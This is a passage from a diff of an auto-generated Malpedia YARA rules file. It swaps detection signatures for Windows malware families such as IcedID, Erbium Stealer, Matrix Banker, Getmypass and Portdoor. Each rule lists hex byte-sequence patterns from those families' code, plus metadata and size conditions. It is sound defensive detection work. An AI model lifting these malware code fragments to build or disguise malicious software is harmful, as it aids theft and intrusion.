-		$sequence_4 = { 50 8d442418 50 894c2420 ff15???????? 83c40c 85c0 }
-		$sequence_5 = { 6a30 ff750c 8d75fc 8bcf e8???????? 83c408 }
-		$sequence_6 = { 8b8de0fdffff 8bc3 668b10 663b11 751e 663bd7 7415 }
-		$sequence_7 = { 33fb 037dfc 8b5ddc 235df4 0bf3 03f7 8b7d88 }
-		$sequence_8 = { 8bf8 83c40c 85ff 0f85da000000 ff742410 8d442448 e8???????? }
-		$sequence_9 = { 8d443718 50 e8???????? 83c40c 8d4618 8bce e8???????? }
+		$sequence_0 = { 8d7e01 3bfb 7ed0 83c8ff eb07 8b04f55c710110 5f }
+		$sequence_1 = { 7214 8b49fc 83c223 2bc1 83c0fc 83f81f 0f87860f0000 }
+		$sequence_2 = { b991000000 8dbd70e2ffff 8bf2 f3a5 b991000000 }
+		$sequence_3 = { 6804010000 8d85b4fcffff 6a00 50 e8???????? 83c40c }
+		$sequence_4 = { 83fe10 8bbd68ffffff 0f43cf 8d5101 }
+		$sequence_5 = { c745e807000000 668945d4 83fa10 722c 8b4d9c 42 8bc1 }
+		$sequence_6 = { 8d85e4f7ffff f3a5 50 8d8528faffff b991000000 8bf3 8dbd18f9ffff }
+		$sequence_7 = { 8d9534fcffff 0f43ce 2bd1 8a01 8d4901 88440aff 84c0 }
+		$sequence_8 = { 83c404 83781408 7202 8b00 50 6a00 }
+		$sequence_9 = { eb07 8b0cc5645c0110 894de4 85c9 7455 8b4510 }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 279552
 }
-rule MALPEDIA_Win_Icedid_Auto : FILE
+rule MALPEDIA_Win_Fireball_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7cb01d8c-6ddc-5faf-a2d7-b352678038d8"
+		id = "a3428bf8-96e6-53b5-b02d-f9e2f263c340"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icedid_auto.yar#L1-L300"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fireball_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "80a642e8024f176494bc232a2f8ca8c27a08e0dff1dc2e9038b4b5cccdea7c2e"
+		logic_hash = "0f22d443c5f81dd9534cb92d3695167967ab7b76ab570ebe6d321bfdbed116f0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -103676,54 +104110,32 @@ rule MALPEDIA_Win_Icedid_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 7511 56 57 ff15???????? }
-		$sequence_1 = { 7411 40 50 6a08 ff15???????? }
-		$sequence_2 = { 50 ff15???????? 8bf7 8bc6 }
-		$sequence_3 = { 7413 ff36 6a08 ff15???????? }
-		$sequence_4 = { 85f6 742c 803e00 7427 6a3b 56 ff15???????? }
-		$sequence_5 = { 85ff 7418 c60700 47 57 ff15???????? }
-		$sequence_6 = { 68???????? 6a00 ff15???????? 33c0 40 }
-		$sequence_7 = { 6a3b 56 ff15???????? 8bf8 85ff 7418 }
-		$sequence_8 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
-		$sequence_9 = { 5f 743f 8d5808 0fb713 }
-		$sequence_10 = { 03c2 eb5c 8d5004 89542414 8b12 85d2 7454 }
-		$sequence_11 = { 0132 47 83c302 3bfd 72c4 8b542414 }
-		$sequence_12 = { 85d2 7454 8d6af8 d1ed }
-		$sequence_13 = { 8d5808 0fb713 8954241c 66c16c241c0c }
-		$sequence_14 = { 8d4508 50 0fb6440b34 50 ff740b28 }
-		$sequence_15 = { 2345fc 8be5 5d c3 55 8bec ff7518 }
-		$sequence_16 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
-		$sequence_17 = { 8a4173 a808 75f5 a804 }
-		$sequence_18 = { ff5010 85c0 7407 33c0 e9???????? }
-		$sequence_19 = { 89442408 0fb70424 8b4c2408 03c8 }
-		$sequence_20 = { 48 8b523c e8???????? 48 89433c 48 85c0 }
-		$sequence_21 = { 48 8945b8 48 85c0 0f84db000000 8b4324 48 }
-		$sequence_22 = { 4c 8b15???????? 48 8d442450 44 }
-		$sequence_23 = { 49 8943d8 ff15???????? 85c0 }
-		$sequence_24 = { 4c8bc3 33d2 488bc8 ff15???????? 488bb590020000 }
-		$sequence_25 = { 3b7b1c 72d7 8b430c 4803c6 0f845affffff 488bcd }
-		$sequence_26 = { 488d5702 488bce ff15???????? ba22000000 488bce ff15???????? 4885c0 }
-		$sequence_27 = { 4289448440 488b5c2428 4c3b5c2430 7307 4c8b742420 }
-		$sequence_28 = { 488bd8 4885c0 0f84cb000000 488bb590020000 41ba01000000 }
-		$sequence_29 = { 488bb590020000 488b7c2438 33c9 33d2 }
-		$sequence_30 = { 80bb8000000040 0f8577ffffff 488d8b81000000 488d542450 e8???????? 85c0 }
-		$sequence_31 = { 75b9 4883c314 e9???????? ff15???????? 33c0 }
+		$sequence_0 = { 837c242008 c78424c800000007000000 c78424c400000000000000 66898424b4000000 }
+		$sequence_1 = { 8d842484000000 50 8d9424d0000000 8d8c24a8010000 c68424cc01000009 e8???????? }
+		$sequence_2 = { 83c404 33c0 83bc249800000008 c744246807000000 c744246400000000 }
+		$sequence_3 = { 83bc24b000000008 c784248000000007000000 c744247c00000000 668944246c 7228 }
+		$sequence_4 = { 8b0e e8???????? eb2a ff750c }
+		$sequence_5 = { 5e c3 55 8bec 8b4508 ff34c5a8f52400 }
+		$sequence_6 = { 3a503a 683a783a7c 3a803a843a98 3a9c3aa03ab83a }
+		$sequence_7 = { 0f43842480000000 6a00 50 ffd7 8d442464 50 }
+		$sequence_8 = { e9???????? 8d8d44fbffff e9???????? 8d8d44fbffff e9???????? 8b542408 8d823cfbffff }
+		$sequence_9 = { 80bda7fdffff00 8b5d1c 8b7d18 8b7508 741d 57 8d4508 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Metadatabin_Auto : FILE
+rule MALPEDIA_Win_Getmypass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bab038c8-9529-5be3-bcc9-7d10f8fe61a6"
+		id = "14973234-1738-56b7-9223-d08c6bb175b6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.metadatabin_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.getmypass_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "407d015151f744f5ae0365f6bb52601cc8c31860d073c726bc5069058743c3e0"
+		logic_hash = "e0df53beaa529f0daff55ba7793f7f6ede1e6ce78673fcc88efeed0e172026bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103737,32 +104149,32 @@ rule MALPEDIA_Win_Metadatabin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d9424b8000000 e8???????? 83bc248800000005 0f848d010000 f20f108c2498000000 f20f108424a0000000 f20f10942488000000 }
-		$sequence_1 = { c745e4c0834000 894dd0 8d4dc0 c745d402000000 89c2 897de8 8975ec }
-		$sequence_2 = { b911000000 89df f3a5 f20f108c2474050000 f20f1094246c050000 f20f1084247c050000 f20f118c24b8030000 }
-		$sequence_3 = { b001 84c9 0f859cfeffff 8b461c 6a01 68???????? ff7618 }
-		$sequence_4 = { 8b470c 83780400 7421 8b5f08 83780809 7308 e8???????? }
-		$sequence_5 = { ff76fc e9???????? 0fb64e2c 85c9 0f84a2000000 83f903 0f84b2000000 }
-		$sequence_6 = { e8???????? 0f0b 660f1f840000000000 55 89e5 83ec08 8b4508 }
-		$sequence_7 = { 8a4220 0f1002 8b4a10 8b5214 8845dc 8d45e0 0f1145bc }
-		$sequence_8 = { c68424010c000000 c78424c00b00003e000000 c68424020c000000 c78424c00b00003f000000 c68424030c000000 c78424c00b000040000000 8db424c00b0000 }
-		$sequence_9 = { 89de 8b9c24a0020000 135c2478 13542424 138424a0000000 03bc2430010000 135c2414 }
+		$sequence_0 = { e8???????? 83c404 85c0 0f8444010000 8b4508 50 e8???????? }
+		$sequence_1 = { 3b4d10 7d12 8b550c 0355fc 8b4508 0345fc 8a08 }
+		$sequence_2 = { 8b45e0 0fbe08 83f944 0f8535010000 837de400 750b 8b55e0 }
+		$sequence_3 = { 55 8bec 83ec08 c745fc00000000 8d45fc 50 68???????? }
+		$sequence_4 = { 55 8bec 83ec08 833d????????04 721d a1???????? }
+		$sequence_5 = { 0f8400010000 837de400 750b 8b45e0 }
+		$sequence_6 = { 8b4d0c 51 e8???????? 83c40c 8d95d8f5ffff 52 8b4508 }
+		$sequence_7 = { 8b45fc 50 6a00 ff15???????? 8985f4fbffff }
+		$sequence_8 = { 8a55f8 8811 ebe1 c745f400000000 8b45f4 8945ec }
+		$sequence_9 = { 83f944 0f85b4020000 837d9819 0f86aa020000 c745a400000000 8b55e0 83ea01 }
 
 	condition:
-		7 of them and filesize < 1263616
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Unidentified_003_Auto : FILE
+rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d98d47b0-9a51-53ac-b838-c109a79a3c60"
+		id = "4b8a0033-eafb-588e-852d-212657477c66"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_003_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.erbium_stealer_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "a77ee5178781b22b88b059404b849af3a08c098d4327a0118f9c2d73b7bfb28c"
+		logic_hash = "52e0e8033201024664e25bae217264a7d239dc0c23fc20bab4e50f4bf89b0343"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103776,32 +104188,32 @@ rule MALPEDIA_Win_Unidentified_003_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b8???????? 2b05???????? ff7006 50 50 8d442464 50 }
-		$sequence_1 = { 7561 6a00 68???????? 8d45f0 e8???????? }
-		$sequence_2 = { 0f8312020000 8dbdf1fdffff 2bf9 8a11 88140f 41 84d2 }
-		$sequence_3 = { 85c0 75b5 8d45f4 50 8d85e3fbffff 50 }
-		$sequence_4 = { 395de0 0f8421010000 8b45e0 8b08 50 }
-		$sequence_5 = { bb01000080 53 ff15???????? 6a22 58 668985f0fbffff 33c0 }
-		$sequence_6 = { 3bc3 7468 3d00100400 741c 3d10100400 7415 3d00100600 }
-		$sequence_7 = { ff45fc 8b45fc 8145f80c020000 81c718040000 3b45f0 0f8238ffffff eb07 }
-		$sequence_8 = { 8b45a4 3bc3 7464 8945d8 33c0 8d7dac ab }
-		$sequence_9 = { 56 e8???????? 59 59 85c0 7408 c60000 }
+		$sequence_0 = { 75f8 ba???????? b926000000 2bd0 }
+		$sequence_1 = { 7409 83c002 66833800 75f7 668b4c2450 6685c9 7418 }
+		$sequence_2 = { 6a04 6800200000 23f0 56 6a00 ff15???????? }
+		$sequence_3 = { ff15???????? 8945bc 68???????? 8b55f4 52 }
+		$sequence_4 = { eb96 6a04 6800300000 6a18 6a00 8b4508 50 }
+		$sequence_5 = { 52 8b4508 50 ff55bc 33c9 }
+		$sequence_6 = { 668b8c24a0020000 6685c9 741b 8d9424a0020000 0fb7c9 2bd0 668908 }
+		$sequence_7 = { ff55b8 c745cc00000000 837dcc00 0f85a2000000 c745c400000000 8d4dc4 51 }
+		$sequence_8 = { 75f8 668b8c24a0020000 6685c9 741b 8d9424a0020000 }
+		$sequence_9 = { 8b55f8 8b45fc 0302 8b4de0 0fb711 81e2ff0f0000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 33792
 }
-rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE
+rule MALPEDIA_Win_Matrix_Banker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b018fd5-a77f-5d35-804b-d70e18428f2b"
+		id = "5e56425b-5f6b-5ff1-8380-5d5609da8da8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiteblackcrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.whiteblackcrypt_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.matrix_banker_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "4f74eb7c5773b19a8be72f0225ca23ef138b3bc453243d9314335e49ca519939"
+		logic_hash = "c882b53f487e75c9405f3f1fd8e8a700ef1f2f55c75fbbd05eae09bdd19de300"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103815,32 +104227,32 @@ rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 40326c243e 31ef 4131fa 4531d6 4531f5 }
-		$sequence_1 = { 7477 83feff 7c60 752e 488b8b38020000 }
-		$sequence_2 = { 410f94c2 4409d0 4109cb 753a }
-		$sequence_3 = { ff15???????? 83f812 0f84d4000000 488b8b38020000 e8???????? 48c7c0ffffffff }
-		$sequence_4 = { 0f840c010000 488d7c2420 4889da 41b804010000 4889f9 }
-		$sequence_5 = { 4889c1 e8???????? 4889e9 4889c2 4883c428 5b }
-		$sequence_6 = { 0f84d4000000 488b8b38020000 e8???????? 48c7c0ffffffff 48898338020000 }
-		$sequence_7 = { 4c89e1 41c6442cff00 e8???????? 4c39e6 }
-		$sequence_8 = { 4889f1 e8???????? 4889f1 85c0 7407 }
-		$sequence_9 = { 4401e6 4d63c4 4889f9 4989d9 ba01000000 }
+		$sequence_0 = { 80f905 7705 80c2a9 eb0b 8d4abf 80f905 }
+		$sequence_1 = { 80f905 7704 04a9 eb0a }
+		$sequence_2 = { eb16 8d489f 80f905 7704 }
+		$sequence_3 = { 66890d???????? 66030d???????? 66890d???????? e8???????? }
+		$sequence_4 = { 8d48bf 80f905 7702 04c9 }
+		$sequence_5 = { 8d4abf 80f905 7703 80c2c9 }
+		$sequence_6 = { 8d489f 80f905 7704 04a9 }
+		$sequence_7 = { eb0a 8d48bf 80f905 7702 04c9 8d4ad0 80f909 }
+		$sequence_8 = { 04a9 eb0a 8d48bf 80f905 7702 }
+		$sequence_9 = { 80f905 7705 80c2a9 eb0b 8d4abf }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 422912
 }
-rule MALPEDIA_Win_Lobshot_Auto : FILE
+rule MALPEDIA_Win_Oatboat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6f20fbff-d088-55ca-8131-38feba325236"
+		id = "4613e236-064b-571a-be7e-ff2a01da6b41"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lobshot_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oatboat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oatboat_auto.yar#L1-L103"
 		license_url = "N/A"
-		logic_hash = "319a86adb13eb9e86d16d75f8640b06a3709c7236ca49379440781ba36dcddcb"
+		logic_hash = "7413375bcf19ea166467a5406a23466233d2d4aaf455c3de8007d0b602ee838d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103854,32 +104266,30 @@ rule MALPEDIA_Win_Lobshot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4e08 8a86b1160000 eb10 85c0 7e12 8b5608 8b4e14 }
-		$sequence_1 = { 0f8c89040000 85db b98a000000 6a07 58 0f45c8 33c0 }
-		$sequence_2 = { 5f c3 53 56 85c9 7462 }
-		$sequence_3 = { 6685c9 740a 83f92e 7405 }
-		$sequence_4 = { 8945e8 66d3e0 660b86b0160000 0fb7c0 8945f8 6a10 58 }
-		$sequence_5 = { 8b7d18 33c9 6a0f 41 58 39b48d78ffffff 7505 }
-		$sequence_6 = { 8b4764 8a5401ff 8b8f98160000 8b879c160000 66893448 8b8798160000 8b8f90160000 }
-		$sequence_7 = { ff35???????? 6801000080 ff15???????? 85c0 0f851e010000 55 8b2d???????? }
-		$sequence_8 = { 8b8b4c140000 8b83580b0000 8b55ec 89848b540b0000 8bcb e8???????? }
-		$sequence_9 = { 83ec30 8b4204 8945d8 8b4208 53 8b1a 56 }
+		$sequence_0 = { c745e465655669 c745e872747561 c745ec6c4d656d c745f06f727900 e8???????? 41b900800000 }
+		$sequence_1 = { 488d0dc20b0000 ff15???????? 33c0 4883c450 415f }
+		$sequence_2 = { 4c896538 c745e04e74416c c745e46c6f6361 c745e874655669 c745ec72747561 c745f06c4d656d c745f46f727900 }
+		$sequence_3 = { c745e8656d6f72 66c745ec7900 e8???????? 4d8bc4 }
+		$sequence_4 = { c745ec72747561 c745f06c4d656d c745f46f727900 e8???????? 4c8d4d38 c744242840000000 4533c0 }
+		$sequence_5 = { 488bc8 e8???????? 488bd8 488b7c2458 488bc3 }
+		$sequence_6 = { 7527 488d4df0 c745f04c6f6164 c745f44c696272 c745f861727957 44887dfc e8???????? }
+		$sequence_7 = { c745ec33003200 c745f02e004400 c745f44c004c00 e8???????? }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 58368
 }
-rule MALPEDIA_Win_Powerloader_Auto : FILE
+rule MALPEDIA_Win_Campoloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c50a3558-9d40-5d02-8dcc-a013fb97306d"
+		id = "47bbab4d-d2fa-57b5-b699-26c8446d214c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powerloader_auto.yar#L1-L106"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.campoloader_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "c426c342e944500b9eabe80251134c6aa09970a7034e66d9d42756bf84d7595a"
+		logic_hash = "66a1664e5b6aaa82c7d5c893eda78f4cfabab07bd0de557bd9bf7b0222c59b17"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103893,32 +104303,32 @@ rule MALPEDIA_Win_Powerloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b7c2430 85ed 740d }
-		$sequence_1 = { e8???????? eb22 33c9 66666666660f1f840000000000 0fb6840c30010000 }
-		$sequence_2 = { 33d2 ff15???????? 83f81f 7323 }
-		$sequence_3 = { 7441 8b5c2430 85db 741d }
-		$sequence_4 = { 8bd0 e8???????? 85ff 740c }
-		$sequence_5 = { e8???????? 0fb6d8 84c0 7514 ff15???????? }
-		$sequence_6 = { e8???????? 0fb6d8 84c0 7514 }
-		$sequence_7 = { eb22 33c9 66666666660f1f840000000000 0fb6840c30010000 }
-		$sequence_8 = { e8???????? eb22 33c9 66666666660f1f840000000000 }
-		$sequence_9 = { 33d2 c605????????00 e8???????? 0fb6c3 }
+		$sequence_0 = { 2b4dd8 894dd4 8b55f8 0355d4 8955f8 8b45f8 }
+		$sequence_1 = { 7407 33c0 e9???????? c78548efffff00000000 8d8de8fcffff 898d7cefffff }
+		$sequence_2 = { 898568efffff 8d95f0feffff 52 ff15???????? 898550efffff 0fb78554efffff 50 }
+		$sequence_3 = { 8bec b8bc100000 e8???????? a1???????? 33c5 8945fc a1???????? }
+		$sequence_4 = { 8b55f8 0355d4 8955f8 8b45f8 }
+		$sequence_5 = { 8a11 8855e4 8345d001 807de400 75ee 8b45d0 2b45a4 }
+		$sequence_6 = { e8???????? 83c404 89856cefffff 8b958cefffff 2b956cefffff 89958cefffff c78564efffff00000000 }
+		$sequence_7 = { ff15???????? 898550efffff 0fb78554efffff 50 ff15???????? 66898522f1ffff b902000000 }
+		$sequence_8 = { 8b45e4 8945ec 8b4dec 83c101 894dd8 }
+		$sequence_9 = { c745f8ffffffff 8b45e8 50 8b4d08 51 ff15???????? 83c408 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 66560
 }
-rule MALPEDIA_Win_Pocodown_Auto : FILE
+rule MALPEDIA_Win_Svcready_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24fa8c2b-d3e1-5926-9dee-69a93fed8b3c"
+		id = "e83853f3-e66b-52ee-ae09-132965a1cb28"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pocodown_auto.yar#L1-L90"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.svcready_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "81ce65c7d22552fcdf6138ce3c49e38f993fc4ab399006dba75fe36bc9807464"
+		logic_hash = "70f5a6e47586d208a50ef25a32145ee8864e4794b50daca718026585b6e54bc9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103932,30 +104342,32 @@ rule MALPEDIA_Win_Pocodown_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8c2488000000 e8???????? 85c0 0f849d010000 }
-		$sequence_1 = { 8b8c2488000000 e8???????? 03442460 89842488000000 }
-		$sequence_2 = { 8b8c2488000000 8d840801fcffff 8944244c 837c244c00 }
-		$sequence_3 = { 8b8c2488000000 e8???????? 89842488000000 488b442478 }
-		$sequence_4 = { 8b8c2488000000 8d8401f33e706d 89842488000000 ba05000000 }
-		$sequence_5 = { 8b8c2488000000 e8???????? 4885c0 7529 }
-		$sequence_6 = { 8b8c2488000000 e8???????? 4883bc249000000000 741a }
-		$sequence_7 = { 8b8c2488000000 ff15???????? 85c0 7519 }
+		$sequence_0 = { 895c2410 8bc7 896c2418 f7d2 33c6 0bfa 21542410 }
+		$sequence_1 = { eb02 33f6 895d28 8d4702 }
+		$sequence_2 = { 89442410 33c0 89742414 896c2418 895c241c ab }
+		$sequence_3 = { 66c7070100 885f02 891e 885e04 895e08 895e0c 895dfc }
+		$sequence_4 = { 8b442428 40 50 57 51 }
+		$sequence_5 = { 8b01 8902 83c204 83c104 894dec 8b45e8 ebea }
+		$sequence_6 = { 50 ff74241c ff15???????? 33c0 8d7c2408 ab }
+		$sequence_7 = { 8bca 8dbefc600000 f3ab 8bca }
+		$sequence_8 = { 2bd1 8b7c2414 2bf1 c1fa02 c1fe02 3bfa 7678 }
+		$sequence_9 = { 3c58 7504 897c2414 52 51 e8???????? 89442430 }
 
 	condition:
-		7 of them and filesize < 6703104
+		7 of them and filesize < 1187840
 }
-rule MALPEDIA_Win_Thanatos_Auto : FILE
+rule MALPEDIA_Win_Doublefinger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "503a7f37-fd56-5eb4-8fd1-5ecbf912c720"
+		id = "1a4bb31a-3c01-5b6e-ae26-bb31027c979c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thanatos_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doublefinger_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "a490fddf2b1c7ed46086686ac0e8278c90a6f240d56058a2bebac261ed9edf67"
+		logic_hash = "34310946832cc40b49a31828e604fb9d9a1c8fad12732184c4ffa2b4443b2159"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103969,32 +104381,32 @@ rule MALPEDIA_Win_Thanatos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740a 8b45f8 83e007 3c05 751c 834714fc }
-		$sequence_1 = { ff15???????? 03c0 50 53 ffb514fdffff 56 ff15???????? }
-		$sequence_2 = { 8b856cffffff 8906 8b8570ffffff 8907 8b4dfc 5f 33cd }
-		$sequence_3 = { 56 8d43fe 8bd1 33f6 57 8b7d08 }
-		$sequence_4 = { 8d0449 8d0445981c0210 5d c3 8d04cd00000000 2bc1 8d0445c0390210 }
-		$sequence_5 = { 2db8000000 81e6ff1f0000 03f0 0fb7047528f10110 6685c0 74c5 }
-		$sequence_6 = { 6a00 c705????????00000000 c705????????00000000 ff15???????? 85c0 743e 8d85f0fdffff }
-		$sequence_7 = { 66a1???????? 668945f8 a0???????? 83c420 8845fa 8d45f4 50 }
-		$sequence_8 = { 0f8718010000 8b35???????? 68???????? 53 ffd6 85c0 }
-		$sequence_9 = { 83e003 c1e004 5f 0fb68028850110 884101 5e }
+		$sequence_0 = { c644247d64 c644247e79 c644247f97 488d942410030000 488d4c2478 e8???????? }
+		$sequence_1 = { 8b442448 39442444 7d27 41b87a000000 ba61000000 488b8c2468010000 e8???????? }
+		$sequence_2 = { 4533c0 8b942464010000 488b4c2450 e8???????? }
+		$sequence_3 = { c6440478af ba0a020000 b940000000 488b842468010000 ff5038 }
+		$sequence_4 = { e8???????? ba0a020000 488d8c2460010000 e8???????? }
+		$sequence_5 = { 39442408 0f8394000000 c6042400 c744240400000000 eb0a 8b442404 }
+		$sequence_6 = { 488bc1 eb7a 837c242000 7471 }
+		$sequence_7 = { ba0a020000 b940000000 488b442470 ff5038 }
+		$sequence_8 = { 3565708005 8984246c010000 8b84246c010000 8b4c2460 33c8 }
+		$sequence_9 = { 66898424fc000000 33c0 66898424fe000000 ba64000000 }
 
 	condition:
-		7 of them and filesize < 1810432
+		7 of them and filesize < 115712
 }
-rule MALPEDIA_Win_Furtim_Auto : FILE
+rule MALPEDIA_Win_Portdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad577b23-66c9-5c51-817c-414dfaa85803"
+		id = "e4b852ed-5498-5523-835d-78e52c259853"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.furtim_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.portdoor_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "d317e4f334ec1dda33c613c0848248b97fb2b5924cd44cad020709ead778cee8"
+		logic_hash = "7da9aa8b4f7f6857e35f1211f6a60eddf3c94eedff73ea09aab294e2b6809d65"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104008,32 +104420,32 @@ rule MALPEDIA_Win_Furtim_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 55 8bec 83ec68 53 56 68???????? }
-		$sequence_1 = { 85c0 7413 8b4c2424 8bd1 2bd6 8a12 8811 }
-		$sequence_2 = { 55 8bec 8b4508 ff34c5d0404100 ff15???????? 5d c3 }
